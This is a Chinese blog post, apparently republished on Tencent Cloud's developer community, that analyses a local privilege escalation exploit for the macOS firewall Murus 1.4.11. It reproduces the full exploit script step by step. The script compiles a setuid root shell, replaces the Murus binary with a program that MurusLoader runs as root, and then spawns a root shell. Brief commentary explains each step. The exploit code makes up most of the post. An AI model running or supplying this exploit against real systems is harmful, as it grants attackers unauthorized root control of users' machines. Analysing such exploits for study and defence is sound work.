前往小程序,Get更优阅读体验!
立即前往
文档建议反馈控制台
首页
学习
活动
专区
工具
TVP
腾讯云架构师技术同盟
文章/答案/技术大牛
发布
首页
学习
活动
专区
工具
TVP腾讯云架构师技术同盟
返回腾讯云官网
社区首页 >专栏 >Murus 1.4.11 - Local Privilege Escalation 漏洞简析

Murus 1.4.11 - Local Privilege Escalation 漏洞简析

作者头像
用户1423082
发布2024-12-31 18:26:07
发布2024-12-31 18:26:07
8000
代码可运行
举报
文章被收录于专栏:giantbranch's bloggiantbranch's blog
运行总次数:0
代码可运行

没有mac的苦逼就直接分析代码了

首先Murus是mac的防火墙,这个东西只要可以以admin权限运行就可以提权了

step1

首先我们看到编译一个c程序

代码语言:javascript
代码运行次数:0
复制
cat > /tmp/murus411_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl("/bin/bash","bash","-c","rm -f /tmp/murus411_exp; /bin/bash",NULL);
  return 0;
}
EOF
 
gcc -o /tmp/murus411_exp /tmp/murus411_exp.c

if [ ! $? -eq 0 ] ; then
  rm -f /tmp/murus411_exp.c
    echo "failed to compile, dev tools may not be installed"
  exit 1
fi
 
rm -f /tmp/murus411_exp.c

看到这里我们就知道这应该是不正当权限运行程序导致的,先设置当前程序的uid和euid,之后执行/bin/bash

而$? 可以获取上一个命令的退出状态。所谓退出状态,就是上一个命令执行后的返回结果。

成功应该返回0,如果返回不是0说明编译有问题了

step2

之后又编译第二个程序

代码语言:javascript
代码运行次数:0
复制
cat > /tmp/murus411_exp2.c <<EOF
#include <unistd.h>
#include <stdlib.h>
int main()
{
  setuid(0);
  seteuid(0);
  system("chown root:wheel /tmp/murus411_exp");
  system("chmod 4755 /tmp/murus411_exp");
  system("mv /Applications/Murus.app/Contents/MacOS/Murus.orig /Applications/\
Murus.app/Contents/MacOS/Murus");
  execl("/Applications/Murus.app/Contents/MacOS/Murus","Murus",NULL);
  return 0;
}
EOF
 
gcc -o /tmp/murus411_exp2 /tmp/murus411_exp2.c
rm -f /tmp/murus411_exp2.c

这个就将第一个程序拥有者设置为0,并设置suid位,最后mv Murus.orig并执行

step3

查找进程MurusLoader,看看起来了没

代码语言:javascript
代码运行次数:0
复制
while :
do
  ps auxwww |grep '/Applications/Murus.app/Contents/MacOS/MurusLoader' \
    |grep -v grep 1>/dev/null
  if [ $? -eq 0 ] ; then
    break
  fi
done

step4

代码语言:javascript
代码运行次数:0
复制
mv /Applications/Murus.app/Contents/MacOS/Murus /Applications/Murus.app/\
Contents/MacOS/Murus.orig
mv /tmp/murus411_exp2 /Applications/Murus.app/Contents/MacOS/Murus

最后将原来的Murus替换为我们的exp2

那么问题就是MurusLoader以root权限执行/Applications/Murus.app/Contents/MacOS/Murus这个程序导致的问题了,这就是关键所在

step5

最后再检查下我们的文件的拥有者是不是root,之后就获得了root权限了

代码语言:javascript
代码运行次数:0
复制
while :
do
  r=`ls -la /tmp/murus411_exp |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
done
 
echo "kapow"
 
/tmp/murus411_exp

小结

其实很多时候不应要利用内核漏洞去提权,这种以不当的权限启动程序的是一个很好的方法,之前分析nsa的工具的时候,很多都是利用这一点,简单方便,何乐而不为呢

有空总结一下提权的各种套路,大家可以提醒一下我

reference

https://www.exploit-db.com/exploits/43217/

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2018-02-01,如有侵权请联系 cloudcommunity@tencent.com 删除
权限
local
编译
程序
漏洞

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

权限
local
编译
程序
漏洞
评论
登录后参与评论
0 条评论
热度
最新
登录 后参与评论
推荐阅读
目录
  • step1
  • step2
  • step3
  • step4
  • step5
  • 小结
  • reference
领券

腾讯云开发者

扫码关注腾讯云开发者

扫码关注腾讯云开发者

领取腾讯云代金券

热门产品

热门推荐

更多推荐

Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有 

深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569

腾讯云计算(北京)有限责任公司 京ICP证150476号 |  京ICP备11018762号 | 京公网安备号11010802020287

问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档

Copyright © 2013 - 2025 Tencent Cloud.

All Rights Reserved. 腾讯云 版权所有

登录 后参与评论